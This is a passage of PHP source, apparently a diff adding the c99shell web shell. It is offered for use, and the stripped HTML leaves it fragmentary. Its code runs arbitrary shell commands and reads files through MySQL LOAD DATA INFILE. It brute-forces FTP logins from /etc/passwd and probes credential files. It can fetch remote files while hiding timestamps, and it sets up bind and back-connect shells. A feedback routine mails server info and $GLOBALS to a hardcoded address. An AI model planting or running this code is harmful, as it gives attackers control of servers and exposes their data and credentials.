    "; + echo ""; + echo ""; + for ($i=0;$i"; + if (empty($e[0])) {$e[0] = "a";} + if ($e[1] != $v) {echo "".$v."";} + else {echo "".$v."\"".$m."\"";} + echo ""; + } + echo ""; + echo ""; + while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) + { + echo ""; + $w = ""; + $i = 0; + foreach ($row as $k=>$v) {$name = mysql_field_name($result,$i); $w .= " `".$name."` = '".addslashes($v)."' AND"; $i++;} + if (count($row) > 0) {$w = substr($w,0,strlen($w)-3);} + echo ""; + $i = 0; + foreach ($row as $k=>$v) + { + $v = htmlspecialchars($v); + if ($v == "") {$v = "NULL";} + echo ""; + $i++; + } + echo ""; + echo ""; + } + mysql_free_result($result); + echo "
    Action
    ".$v.""; + echo "\"Delete\" "; + echo "\"Edit\" "; + echo "

     

    "; + } + } + else + { + $result = mysql_query("SHOW TABLE STATUS", $sql_sock); + if (!$result) {echo mysql_smarterror();} + else + { + echo "
    "; + $i = 0; + $tsize = $trows = 0; + while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) + { + $tsize += $row["Data_length"]; + $trows += $row["Rows"]; + $size = view_size($row["Data_length"]); + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + $i++; + } + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo "
    Table
    RowsTypeCreatedModifiedSizeAction
     ".$row["Name"]." ".$row["Rows"]."".$row["Type"]."".$row["Create_time"]."".$row["Update_time"]."".$size." \"Empty\"  \"Drop\" \"Insert\" 
    »
    ".$i." table(s)
    ".$trows."".$row[1]."".$row[10]."".$row[11]."".view_size($tsize)."

     

    "; + mysql_free_result($result); + } + } + } + } + } + else + { + $acts = array("","newdb","serverstatus","servervars","processes","getfile"); + if (in_array($sql_act,$acts)) {?>
    Create new DB:
     
    View File:
     
    "; + if ($sql_act == "newdb") + { + echo ""; + if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!
    ";} + else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".
    Reason:
    ".mysql_smarterror();} + } + if ($sql_act == "serverstatus") + { + $result = mysql_query("SHOW STATUS", $sql_sock); + echo "
    Server-status variables:

    "; + echo ""; + while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "";} + echo "
    NameValue
    ".$row[0]."".$row[1]."
    "; + mysql_free_result($result); + } + if ($sql_act == "servervars") + { + $result = mysql_query("SHOW VARIABLES", $sql_sock); + echo "
    Server variables:

    "; + echo ""; + while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "";} + echo "
    NameValue
    ".$row[0]."".$row[1]."
    "; + mysql_free_result($result); + } + if ($sql_act == "processes") + { + if (!empty($kill)) {$query = "KILL ".$kill.";"; $result = mysql_query($query, $sql_sock); echo "Killing process #".$kill."... ok. he is dead, amen.";} + $result = mysql_query("SHOW PROCESSLIST", $sql_sock); + echo "
    Processes:

    "; + echo ""; + while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "";} + echo "
    IDUSERHOSTDBCOMMANDTIMESTATEINFOAction
    ".$row[0]."".$row[1]."".$row[2]."".$row[3]."".$row[4]."".$row[5]."".$row[6]."".$row[7]."Kill
    "; + mysql_free_result($result); + } + if ($sql_act == "getfile") + { + $tmpdb = $sql_login."_tmpdb"; + $select = mysql_select_db($tmpdb); + if (!$select) {mysql_create_db($tmpdb); $select = mysql_select_db($tmpdb); $created = !!$select;} + if ($select) + { + $created = false; + mysql_query("CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );"); + mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file"); + $result = mysql_query("SELECT * FROM tmp_file;"); + if (!$result) {echo "Error in reading file (permision denied)!";} + else + { + for ($i=0;$iFile \"".$sql_getfile."\" does not exists or empty!
    ";} + else {echo "File \"".$sql_getfile."\":
    ".nl2br(htmlspecialchars($f))."
    ";} + mysql_free_result($result); + mysql_query("DROP TABLE tmp_file;"); + } + } + mysql_drop_db($tmpdb); //comment it if you want to leave database + } + } + } +} +echo "
    "; +if ($sql_sock) +{ + $affected = @mysql_affected_rows($sql_sock); + if ((!is_numeric($affected)) or ($affected < 0)){$affected = 0;} + echo "
    Affected rows: ".$affected."
    "; +} +if ($act == "mkdir") +{ +if ($mkdir != $d) +{ + if (file_exists($mkdir)) {echo "Make Dir \"".htmlspecialchars($mkdir)."\": object alredy exists";} + elseif (!mkdir($mkdir)) {echo "Make Dir \"".htmlspecialchars($mkdir)."\": access denied";} + echo "

    "; +} +$act = $dspact = "ls"; +} +if ($act == "ftpquickbrute") +{ +echo "Ftp Quick brute:
    "; +if (!win) {echo "This functions not work in Windows!

    ";} +else +{ + function c99ftpbrutecheck($host,$port,$timeout,$login,$pass,$sh,$fqb_onlywithsh) + { + if ($fqb_onlywithsh) {$true = (!in_array($sh,array("/bin/false","/sbin/nologin")));} + else {$true = true;} + if ($true) + { + $sock = @ftp_connect($host,$port,$timeout); + if (@ftp_login($sock,$login,$pass)) + { + echo "Connected to ".$host." with login \"".$login."\" and password \"".$pass."\".
    "; + ob_flush(); + return true; + } + } + } + if (!empty($submit)) + { + if (!is_numeric($fqb_lenght)) {$fqb_lenght = $nixpwdperpage;} + $fp = fopen("/etc/passwd","r"); + if (!$fp) {echo "Can't get /etc/passwd for password-list.";} + else + { + if ($fqb_logging) + { + if ($fqb_logfile) {$fqb_logfp = fopen($fqb_logfile,"w");} + else {$fqb_logfp = false;} + $fqb_log = "FTP Quick Brute (called c99shell v. ".$shver.") started at ".date("d.m.Y H:i:s")."\r\n\r\n"; + if ($fqb_logfile) {fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} + } + ob_flush(); + $i = $success = 0; + $ftpquick_st = getmicrotime(); + while(!feof($fp)) + { + $str = explode(":",fgets($fp,2048)); + if (c99ftpbrutecheck("localhost",21,1,$str[0],$str[0],$str[6],$fqb_onlywithsh)) + { + echo "Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\"
    "; + $fqb_log .= "Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\", at ".date("d.m.Y H:i:s")."\r\n"; + if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} + $success++; + ob_flush(); + } + if ($i > $fqb_lenght) {break;} + $i++; + } + if ($success == 0) {echo "No success. connections!"; $fqb_log .= "No success. connections!\r\n";} + $ftpquick_t = round(getmicrotime()-$ftpquick_st,4); + echo "
    Done!
    Total time (secs.): ".$ftpquick_t."
    Total connections: ".$i."
    Success.: ".$success."
    Unsuccess.:".($i-$success)."
    Connects per second: ".round($i/$ftpquick_t,2)."
    "; + $fqb_log .= "\r\n------------------------------------------\r\nDone!\r\nTotal time (secs.): ".$ftpquick_t."\r\nTotal connections: ".$i."\r\nSuccess.: ".$success."\r\nUnsuccess.:".($i-$success)."\r\nConnects per second: ".round($i/$ftpquick_t,2)."\r\n"; + if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} + if ($fqb_logemail) {@mail($fqb_logemail,"c99shell v. ".$shver." report",$fqb_log);} + fclose($fqb_logfp); + } + } + else + { + $logfile = $tmpdir_logs."c99sh_ftpquickbrute_".date("d.m.Y_H_i_s").".log"; + $logfile = str_replace("//",DIRECTORY_SEPARATOR,$logfile); + echo "

    Read first:

    Users only with shell? 

    Logging? 
    Logging to file? 
    Logging to e-mail? 

    "; + } +} +} +if ($act == "d") +{ +if (!is_dir($d)) {echo "
    Permision denied!
    ";} +else +{ + echo "Directory information:"; + if (!$win) + { + echo "
    Owner/Group "; + $ow = posix_getpwuid(fileowner($d)); + $gr = posix_getgrgid(filegroup($d)); + $row[] = ($ow["name"]?$ow["name"]:fileowner($d))."/".($gr["name"]?$gr["name"]:filegroup($d)); + } + echo "
    Perms".view_perms_color($d)."
    Create time ".date("d/m/Y H:i:s",filectime($d))."
    Access time ".date("d/m/Y H:i:s",fileatime($d))."
    MODIFY time ".date("d/m/Y H:i:s",filemtime($d))."

    "; +} +} +if ($act == "phpinfo") {@ob_clean(); phpinfo(); c99shexit();} +if ($act == "security") +{ +echo "
    Server security information:
    Open base dir: ".$hopenbasedir."
    "; +if (!$win) +{ + if ($nixpasswd) + { + if ($nixpasswd == 1) {$nixpasswd = 0;} + echo "*nix /etc/passwd:
    "; + if (!is_numeric($nixpwd_s)) {$nixpwd_s = 0;} + if (!is_numeric($nixpwd_e)) {$nixpwd_e = $nixpwdperpage;} + echo "
    From:  To:  

    "; + $i = $nixpwd_s; + while ($i < $nixpwd_e) + { + $uid = posix_getpwuid($i); + if ($uid) + { + $uid["dir"] = "".$uid["dir"].""; + echo join(":",$uid)."
    "; + } + $i++; + } + } + else {echo "
    Get /etc/passwd
    ";} +} +else +{ + $v = $_SERVER["WINDIR"]."\repair\sam"; + if (file_get_contents($v)) {echo "You can't crack winnt passwords(".$v.")
    ";} + else {echo "You can crack winnt passwords. Download, and use lcp.crack+ ©.
    ";} +} +if (file_get_contents("/etc/userdomains")) {echo "View cpanel user-domains logs
    ";} +if (file_get_contents("/var/cpanel/accounting.log")) {echo "View cpanel logs
    ";} +if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "Apache configuration (httpd.conf)
    ";} +if (file_get_contents("/etc/httpd.conf")) {echo "Apache configuration (httpd.conf)
    ";} +if (file_get_contents("/etc/syslog.conf")) {echo "Syslog configuration (syslog.conf)
    ";} +if (file_get_contents("/etc/motd")) {echo "Message Of The Day
    ";} +if (file_get_contents("/etc/hosts")) {echo "Hosts
    ";} +function displaysecinfo($name,$value) {if (!empty($value)) {if (!empty($name)) {$name = "".$name." - ";} echo $name.nl2br($value)."
    ";}} +displaysecinfo("OS Version?",myshellexec("cat /proc/version")); +displaysecinfo("Kernel version?",myshellexec("sysctl -a | grep version")); +displaysecinfo("Distrib name",myshellexec("cat /etc/issue.net")); +displaysecinfo("Distrib name (2)",myshellexec("cat /etc/*-realise")); +displaysecinfo("CPU?",myshellexec("cat /proc/cpuinfo")); +displaysecinfo("RAM",myshellexec("free -m")); +displaysecinfo("HDD space",myshellexec("df -h")); +displaysecinfo("List of Attributes",myshellexec("lsattr -a")); +displaysecinfo("Mount options ",myshellexec("cat /etc/fstab")); +displaysecinfo("Is cURL installed?",myshellexec("which curl")); +displaysecinfo("Is lynx installed?",myshellexec("which lynx")); +displaysecinfo("Is links installed?",myshellexec("which links")); +displaysecinfo("Is fetch installed?",myshellexec("which fetch")); +displaysecinfo("Is GET installed?",myshellexec("which GET")); +displaysecinfo("Is perl installed?",myshellexec("which perl")); +displaysecinfo("Where is apache",myshellexec("whereis apache")); +displaysecinfo("Where is perl?",myshellexec("whereis perl")); +displaysecinfo("locate proftpd.conf",myshellexec("locate proftpd.conf")); +displaysecinfo("locate httpd.conf",myshellexec("locate httpd.conf")); +displaysecinfo("locate my.conf",myshellexec("locate my.conf")); +displaysecinfo("locate psybnc.conf",myshellexec("locate psybnc.conf")); +} +if ($act == "mkfile") +{ +if ($mkfile != $d) +{ + if (file_exists($mkfile)) {echo "Make File \"".htmlspecialchars($mkfile)."\": object alredy exists";} + elseif (!fopen($mkfile,"w")) {echo "Make File \"".htmlspecialchars($mkfile)."\": access denied";} + else {$act = "f"; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $f = basename($mkfile);} +} +else {$act = $dspact = "ls";} +} +if ($act == "encoder") +{ +echo "
    Encoder:
    Input:




    Hashes:
    "; +foreach(array("md5","crypt","sha1","crc32") as $v) +{ + echo $v." -
    "; +} +echo "
    Url:

    urlencode - +
    urldecode - +
    Base64:
    base64_encode -
    "; +echo "
    base64_decode - "; +if (base64_encode(base64_decode($encoder_input)) != $encoder_input) {echo "";} +else +{ + $debase64 = base64_decode($encoder_input); + $debase64 = str_replace("\0","[0]",$debase64); + $a = explode("\r\n",$debase64); + $rows = count($a); + $debase64 = htmlspecialchars($debase64); + if ($rows == 1) {echo "";} + else {$rows++; echo "";} + echo " ^"; +} +echo "

    Base convertations:
    dec2hex -
    "; +} +if ($act == "fsbuff") +{ +$arr_copy = $sess_data["copy"]; +$arr_cut = $sess_data["cut"]; +$arr = array_merge($arr_copy,$arr_cut); +if (count($arr) == 0) {echo "
    Buffer is empty!
    ";} +else {echo "File-System buffer

    "; $ls_arr = $arr; $disp_fullpath = true; $act = "ls";} +} +if ($act == "selfremove") +{ +if (($submit == $rndcode) and ($submit != "")) +{ + if (unlink(__FILE__)) {@ob_clean(); echo "Thanks for using c99shell v.".$shver."!"; c99shexit(); } + else {echo "
    Can't delete ".__FILE__."!
    ";} +} +else +{ + if (!empty($rndcode)) {echo "Error: incorrect confimation!";} + $rnd = rand(0,9).rand(0,9).rand(0,9); + echo "
    Self-remove: ".__FILE__."
    Are you sure?
    For confirmation, enter \"".$rnd."\"
     "; +} +} +if ($act == "update") {$ret = c99sh_getupdate(!!$confirmupdate); echo "".$ret.""; if (stristr($ret,"new version")) {echo "

    ";}} +if ($act == "feedback") +{ +$suppmail = base64_decode("Yzk5c2hlbGxAY2N0ZWFtLnJ1"); +if (!empty($submit)) +{ + $ticket = substr(md5(microtime()+rand(1,1000)),0,6); + $body = "c99shell v.".$shver." feedback #".$ticket."\nName: ".htmlspecialchars($fdbk_name)."\nE-mail: ".htmlspecialchars($fdbk_email)."\nMessage:\n".htmlspecialchars($fdbk_body)."\n\nIP: ".$REMOTE_ADDR; + if (!empty($fdbk_ref)) + { + $tmp = @ob_get_contents(); + ob_clean(); + phpinfo(); + $phpinfo = base64_encode(ob_get_contents()); + ob_clean(); + echo $tmp; + $body .= "\n"."phpinfo(): ".$phpinfo."\n"."\$GLOBALS=".base64_encode(serialize($GLOBALS))."\n"; + } + mail($suppmail,"c99shell v.".$shver." feedback #".$ticket,$body,"FROM: ".$suppmail); + echo "
    Thanks for your feedback! Your ticket ID: ".$ticket.".
    "; +} +else {echo "
    Feedback or report bug (".str_replace(array("@","."),array("[at]","[dot]"),$suppmail)."):

    Your name:

    Your e-mail:

    Message:


    Attach server-info *

    There are no checking in the form.

    * - strongly recommended, if you report bug, because we need it for bug-fix.

    We understand languages: English, Russian.

    ";} +} +if ($act == "search") +{ +echo "Search in file-system:
    "; +if (empty($search_in)) {$search_in = $d;} +if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;} +if (empty($search_text_wwo)) {$search_text_regexp = 0;} +if (!empty($submit)) +{ + $found = array(); + $found_d = 0; + $found_f = 0; + $search_i_f = 0; + $search_i_d = 0; + $a = array + ( + "name"=>$search_name, "name_regexp"=>$search_name_regexp, + "text"=>$search_text, "text_regexp"=>$search_text_regxp, + "text_wwo"=>$search_text_wwo, + "text_cs"=>$search_text_cs, + "text_not"=>$search_text_not + ); + $searchtime = getmicrotime(); + $in = array_unique(explode(";",$search_in)); + foreach($in as $v) {c99fsearch($v);} + $searchtime = round(getmicrotime()-$searchtime,4); + if (count($found) == 0) {echo "No files found!";} + else + { + $ls_arr = $found; + $disp_fullpath = true; + $act = "ls"; + } +} +echo "
    + +Search for (file/folder name):   - regexp +
    Search in (explode \";\"): +

    Text:
    +

    - regexp +   - whole words only +   - case sensitive +   - find files NOT containing the text +

    "; +if ($act == "ls") {$dspact = $act; echo "
    Search took ".$searchtime." secs (".$search_i_f." files and ".$search_i_d." folders, ".round(($search_i_f+$search_i_d)/$searchtime,4)." objects per second).

    ";} +} +if ($act == "chmod") +{ +$mode = fileperms($d.$f); +if (!$mode) {echo "Change file-mode with error: can't get current value.";} +else +{ + $form = true; + if ($chmod_submit) + { + $octet = "0".base_convert(($chmod_o["r"]?1:0).($chmod_o["w"]?1:0).($chmod_o["x"]?1:0).($chmod_g["r"]?1:0).($chmod_g["w"]?1:0).($chmod_g["x"]?1:0).($chmod_w["r"]?1:0).($chmod_w["w"]?1:0).($chmod_w["x"]?1:0),2,8); + if (chmod($d.$f,$octet)) {$act = "ls"; $form = false; $err = "";} + else {$err = "Can't chmod to ".$octet.".";} + } + if ($form) + { + $perms = parse_perms($mode); + echo "Changing file-mode (".$d.$f."), ".view_perms_color($d.$f)." (".substr(decoct(fileperms($d.$f)),-4,4).")
    ".($err?"Error: ".$err:"")."
    Owner

     Read
     Write
    eXecute
    Group

     Read
     Write
    eXecute
    World

     Read
     Write
    eXecute
    "; + } +} +} +if ($act == "upload") +{ +$uploadmess = ""; +$uploadpath = str_replace("\\",DIRECTORY_SEPARATOR,$uploadpath); +if (empty($uploadpath)) {$uploadpath = $d;} +elseif (substr($uploadpath,-1) != "/") {$uploadpath .= "/";} +if (!empty($submit)) +{ + global $HTTP_POST_FILES; + $uploadfile = $HTTP_POST_FILES["uploadfile"]; + if (!empty($uploadfile["tmp_name"])) + { + if (empty($uploadfilename)) {$destin = $uploadfile["name"];} + else {$destin = $userfilename;} + if (!move_uploaded_file($uploadfile["tmp_name"],$uploadpath.$destin)) {$uploadmess .= "Error uploading file ".$uploadfile["name"]." (can't copy \"".$uploadfile["tmp_name"]."\" to \"".$uploadpath.$destin."\"!
    ";} + } + elseif (!empty($uploadurl)) + { + if (!empty($uploadfilename)) {$destin = $uploadfilename;} + else + { + $destin = explode("/",$destin); + $destin = $destin[count($destin)-1]; + if (empty($destin)) + { + $i = 0; + $b = ""; + while(file_exists($uploadpath.$destin)) {if ($i > 0) {$b = "_".$i;} $destin = "index".$b.".html"; $i++;}} + } + if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "Incorect url!
    ";} + else + { + $st = getmicrotime(); + $content = @file_get_contents($uploadurl); + $dt = round(getmicrotime()-$st,4); + if (!$content) {$uploadmess .= "Can't download file!
    ";} + else + { + if ($filestealth) {$stat = stat($uploadpath.$destin);} + $fp = fopen($uploadpath.$destin,"w"); + if (!$fp) {$uploadmess .= "Error writing to file ".htmlspecialchars($destin)."!
    ";} + else + { + fwrite($fp,$content,strlen($content)); + fclose($fp); + if ($filestealth) {touch($uploadpath.$destin,$stat[9],$stat[8]);} + } + } + } + } +} +if ($miniform) +{ + echo "".$uploadmess.""; + $act = "ls"; +} +else +{ + echo "File upload:
    ".$uploadmess."
    +Select file on your local computer:
                   or
    +Input URL:

    +Save this file dir:

    +File-name (auto-fill):

    + convert file name to lovercase

    + +
    "; +} +} +if ($act == "delete") +{ +$delerr = ""; +foreach ($actbox as $v) +{ + $result = false; + $result = fs_rmobj($v); + if (!$result) {$delerr .= "Can't delete ".htmlspecialchars($v)."
    ";} +} +if (!empty($delerr)) {echo "Deleting with errors:
    ".$delerr;} +$act = "ls"; +} +if (!$usefsbuff) +{ +if (($act == "paste") or ($act == "copy") or ($act == "cut") or ($act == "unselect")) {echo "
    Sorry, buffer is disabled. For enable, set directive \"\$useFSbuff\" as TRUE.
    ";} +} +else +{ +if ($act == "copy") {$err = ""; $sess_data["copy"] = array_merge($sess_data["copy"],$actbox); c99_sess_put($sess_data); $act = "ls"; } +elseif ($act == "cut") {$sess_data["cut"] = array_merge($sess_data["cut"],$actbox); c99_sess_put($sess_data); $act = "ls";} +elseif ($act == "unselect") {foreach ($sess_data["copy"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["copy"][$k]);}} foreach ($sess_data["cut"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["cut"][$k]);}} c99_sess_put($sess_data); $act = "ls";} +if ($actemptybuff) {$sess_data["copy"] = $sess_data["cut"] = array(); c99_sess_put($sess_data);} +elseif ($actpastebuff) +{ + $psterr = ""; + foreach($sess_data["copy"] as $k=>$v) + { + $to = $d.basename($v); + if (!fs_copy_obj($v,$to)) {$psterr .= "Can't copy ".$v." to ".$to."!
    ";} + if ($copy_unset) {unset($sess_data["copy"][$k]);} + } + foreach($sess_data["cut"] as $k=>$v) + { + $to = $d.basename($v); + if (!fs_move_obj($v,$to)) {$psterr .= "Can't move ".$v." to ".$to."!
    ";} + unset($sess_data["cut"][$k]); + } + c99_sess_put($sess_data); + if (!empty($psterr)) {echo "Pasting with errors:
    ".$psterr;} + $act = "ls"; +} +elseif ($actarcbuff) +{ + $arcerr = ""; + if (substr($actarcbuff_path,-7,7) == ".tar.gz") {$ext = ".tar.gz";} + else {$ext = ".tar.gz";} + if ($ext == ".tar.gz") {$cmdline = "tar cfzv";} + $cmdline .= " ".$actarcbuff_path; + $objects = array_merge($sess_data["copy"],$sess_data["cut"]); + foreach($objects as $v) + { + $v = str_replace("\\",DIRECTORY_SEPARATOR,$v); + if (substr($v,0,strlen($d)) == $d) {$v = basename($v);} + if (is_dir($v)) + { + if (substr($v,-1) != DIRECTORY_SEPARATOR) {$v .= DIRECTORY_SEPARATOR;} + $v .= "*"; + } + $cmdline .= " ".$v; + } + $tmp = realpath("."); + chdir($d); + $ret = myshellexec($cmdline); + chdir($tmp); + if (empty($ret)) {$arcerr .= "Can't call archivator (".htmlspecialchars(str2mini($cmdline,60)).")!
    ";} + $ret = str_replace("\r\n","\n",$ret); + $ret = explode("\n",$ret); + if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["copy"][$k]);}} + foreach($sess_data["cut"] as $k=>$v) + { + if (in_array($v,$ret)) {fs_rmobj($v);} + unset($sess_data["cut"][$k]); + } + c99_sess_put($sess_data); + if (!empty($arcerr)) {echo "Archivation errors:
    ".$arcerr;} + $act = "ls"; +} +elseif ($actpastebuff) +{ + $psterr = ""; + foreach($sess_data["copy"] as $k=>$v) + { + $to = $d.basename($v); + if (!fs_copy_obj($v,$d)) {$psterr .= "Can't copy ".$v." to ".$to."!
    ";} + if ($copy_unset) {unset($sess_data["copy"][$k]);} + } + foreach($sess_data["cut"] as $k=>$v) + { + $to = $d.basename($v); + if (!fs_move_obj($v,$d)) {$psterr .= "Can't move ".$v." to ".$to."!
    ";} + unset($sess_data["cut"][$k]); + } + c99_sess_put($sess_data); + if (!empty($psterr)) {echo "Pasting with errors:
    ".$psterr;} + $act = "ls"; +} +} +if ($act == "cmd") +{ +if (trim($cmd) == "ps -aux") {$act = "processes";} +elseif (trim($cmd) == "tasklist") {$act = "processes";} +else +{ +@chdir($chdir); +if (!empty($submit)) +{ + echo "Result of execution this command:
    "; + $olddir = realpath("."); + @chdir($d); + $ret = myshellexec($cmd); + $ret = convert_cyr_string($ret,"d","w"); + if ($cmd_txt) + { + $rows = count(explode("\r\n",$ret))+1; + if ($rows < 10) {$rows = 10;} + echo "
    "; + } + else {echo $ret."
    ";} + @chdir($olddir); +} +else {echo "Execution command"; if (empty($cmd_txt)) {$cmd_txt = true;}} +echo "


     Display in text-area 
    "; +} +} +if ($act == "ls") +{ +if (count($ls_arr) > 0) {$list = $ls_arr;} +else +{ + $list = array(); + if ($h = @opendir($d)) + { + while (($o = readdir($h)) !== false) {$list[] = $d.$o;} + closedir($h); + } + else {} +} +if (count($list) == 0) {echo "
    Can't open folder (".htmlspecialchars($d).")!
    ";} +else +{ + //Building array + $objects = array(); + $vd = "f"; //Viewing mode + if ($vd == "f") + { + $objects["head"] = array(); + $objects["folders"] = array(); + $objects["links"] = array(); + $objects["files"] = array(); + foreach ($list as $v) + { + $o = basename($v); + $row = array(); + if ($o == ".") {$row[] = $d.$o; $row[] = "LINK";} + elseif ($o == "..") {$row[] = $d.$o; $row[] = "LINK";} + elseif (is_dir($v)) + { + if (is_link($v)) {$type = "LINK";} + else {$type = "DIR";} + $row[] = $v; + $row[] = $type; + } + elseif(is_file($v)) {$row[] = $v; $row[] = filesize($v);} + $row[] = filemtime($v); + if (!$win) + { + $ow = posix_getpwuid(fileowner($v)); + $gr = posix_getgrgid(filegroup($v)); + $row[] = ($ow["name"]?$ow["name"]:fileowner($v))."/".($gr["name"]?$gr["name"]:filegroup($v)); + } + $row[] = fileperms($v); + if (($o == ".") or ($o == "..")) {$objects["head"][] = $row;} + elseif (is_link($v)) {$objects["links"][] = $row;} + elseif (is_dir($v)) {$objects["folders"][] = $row;} + elseif (is_file($v)) {$objects["files"][] = $row;} + $i++; + } + $row = array(); + $row[] = "Name"; + $row[] = "Size"; + $row[] = "Modify"; + if (!$win) + {$row[] = "Owner/Group";} + $row[] = "Perms"; + $row[] = "Action"; + $parsesort = parsesort($sort); + $sort = $parsesort[0].$parsesort[1]; + $k = $parsesort[0]; + if ($parsesort[1] != "a") {$parsesort[1] = "d";} + $y = ""; + $y .= "\"".($parsesort[1]"; + $row[$k] .= $y; + for($i=0;$i".$row[$i]."";} + } + $v = $parsesort[0]; + usort($objects["folders"], "tabsort"); + usort($objects["links"], "tabsort"); + usort($objects["files"], "tabsort"); + if ($parsesort[1] == "d") + { + $objects["folders"] = array_reverse($objects["folders"]); + $objects["files"] = array_reverse($objects["files"]); + } + $objects = array_merge($objects["head"],$objects["folders"],$objects["links"],$objects["files"]); + $tab = array(); + $tab["cols"] = array($row); + $tab["head"] = array(); + $tab["folders"] = array(); + $tab["links"] = array(); + $tab["files"] = array(); + $i = 0; + foreach ($objects as $a) + { + $v = $a[0]; + $o = basename($v); + $dir = dirname($v); + if ($disp_fullpath) {$disppath = $v;} + else {$disppath = $o;} + $disppath = str2mini($disppath,60); + if (in_array($v,$sess_data["cut"])) {$disppath = "".$disppath."";} + elseif (in_array($v,$sess_data["copy"])) {$disppath = "".$disppath."";} + foreach ($regxp_highlight as $r) + { + if (ereg($r[0],$o)) + { + if ((!is_numeric($r[1])) or ($r[1] > 3)) {$r[1] = 0; ob_clean(); echo "Warning! Configuration error in \$regxp_highlight[".$k."][0] - unknown command."; c99shexit();} + else + { + $r[1] = round($r[1]); + $isdir = is_dir($v); + if (($r[1] == 0) or (($r[1] == 1) and !$isdir) or (($r[1] == 2) and !$isdir)) + { + if (empty($r[2])) {$r[2] = ""; $r[3] = "";} + $disppath = $r[2].$disppath.$r[3]; + if ($r[4]) {break;} + } + } + } + } + $uo = urlencode($o); + $ud = urlencode($dir); + $uv = urlencode($v); + $row = array(); + if ($o == ".") + { + $row[] = " ".$o.""; + $row[] = "LINK"; + } + elseif ($o == "..") + { + $row[] = " ".$o.""; + $row[] = "LINK"; + } + elseif (is_dir($v)) + { + if (is_link($v)) + { + $disppath .= " => ".readlink($v); + $type = "LINK"; + $row[] = " [".$disppath."]"; + } + else + { + $type = "DIR"; + $row[] = " [".$disppath."]"; + } + $row[] = $type; + } + elseif(is_file($v)) + { + $ext = explode(".",$o); + $c = count($ext)-1; + $ext = $ext[$c]; + $ext = strtolower($ext); + $row[] = " ".$disppath.""; + $row[] = view_size($a[1]); + } + $row[] = date("d.m.Y H:i:s",$a[2]); + if (!$win) {$row[] = $a[3];} + $row[] = "".view_perms_color($v).""; + if ($o == ".") {$checkbox = ""; $i--;} + else {$checkbox = "";} + if (is_dir($v)) {$row[] = "\"Info\" ".$checkbox;} + else {$row[] = "\"Info\" \"Change\" \"Download\" ".$checkbox;} + if (($o == ".") or ($o == "..")) {$tab["head"][] = $row;} + elseif (is_link($v)) {$tab["links"][] = $row;} + elseif (is_dir($v)) {$tab["folders"][] = $row;} + elseif (is_file($v)) {$tab["files"][] = $row;} + $i++; + } + } + //Compiling table + $table = array_merge($tab["cols"],$tab["head"],$tab["folders"],$tab["links"],$tab["files"]); + echo "
    Listing folder (".count($tab["files"])." files and ".(count($tab["folders"])+count($tab["links"]))." folders):

    "; + foreach($table as $row) + { + echo "\r\n"; + foreach($row as $v) {echo "\r\n";} + echo "\r\n"; + } + echo "
    ".$v."

    + +    + "; + if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0 and ($usefsbuff)) + { + echo "                   "; + } + echo " 

    "; + echo ""; +} +} +if ($act == "tools") +{ +$bndportsrcs = array( + "c99sh_bindport.pl"=>array("Using PERL","perl %path %port"), + "c99sh_bindport.c"=>array("Using C","%path %port %pass") +); +$bcsrcs = array( + "c99sh_backconn.pl"=>array("Using PERL","perl %path %host %port"), + "c99sh_backconn.c"=>array("Using C","%path %host %port") +); +$dpsrcs = array( + "c99sh_datapipe.pl"=>array("Using PERL","perl %path %localport %remotehost %remoteport"), + "c99sh_datapipe.c"=>array("Using C","%path %localport %remoteport %remotehost") +); +if (!is_array($bind)) {$bind = array();} +if (!is_array($bc)) {$bc = array();} +if (!is_array($datapipe)) {$datapipe = array();} + +if (!is_numeric($bind["port"])) {$bind["port"] = $bindport_port;} +if (empty($bind["pass"])) {$bind["pass"] = $bindport_pass;} + +if (empty($bc["host"])) {$bc["host"] = getenv("REMOTE_ADDR");} +if (!is_numeric($bc["port"])) {$bc["port"] = $bc_port;} + +if (empty($datapipe["remoteaddr"])) {$datapipe["remoteaddr"] = "irc.dalnet.ru:6667";} +if (!is_numeric($datapipe["localport"])) {$datapipe["localport"] = $datapipe_localport;} +if (!empty($bindsubmit)) +{ + echo "Result of binding port:
    "; + $v = $bndportsrcs[$bind["src"]]; + if (empty($v)) {echo "Unknown file!
    ";} + elseif (fsockopen(getenv("SERVER_ADDR"),$bind["port"],$errno,$errstr,0.1)) {echo "Port alredy in use, select any other!
    ";} + else + { + $w = explode(".",$bind["src"]); + $ext = $w[count($w)-1]; + unset($w[count($w)-1]); + $srcpath = join(".",$w).".".rand(0,999).".".$ext; + $binpath = $tmpdir.join(".",$w).rand(0,999); + if ($ext == "pl") {$binpath = $srcpath;} + @unlink($srcpath); + $fp = fopen($srcpath,"ab+"); + if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!
